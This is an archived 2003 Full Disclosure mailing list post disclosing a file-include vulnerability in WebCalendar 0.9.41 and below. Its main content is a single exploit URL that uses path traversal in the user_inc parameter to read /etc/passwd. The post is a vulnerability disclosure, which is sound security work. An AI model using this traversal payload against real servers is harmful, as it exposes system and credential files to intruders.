Full Disclosure mailing list archives
WebCalendar Include File
From: noconflic <nocon () texas-shooters com>
Date: Sun, 20 Jul 2003 20:20:15 -0500
Webcalendar 0.9.41 and below. http://webcalendar.sourceforge.net/ Since this appears to be public info now. Problem: http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588 Exploit: http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd - nocon http://nocon.darkflame.net/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- WebCalendar Include File noconflic (Jul 20)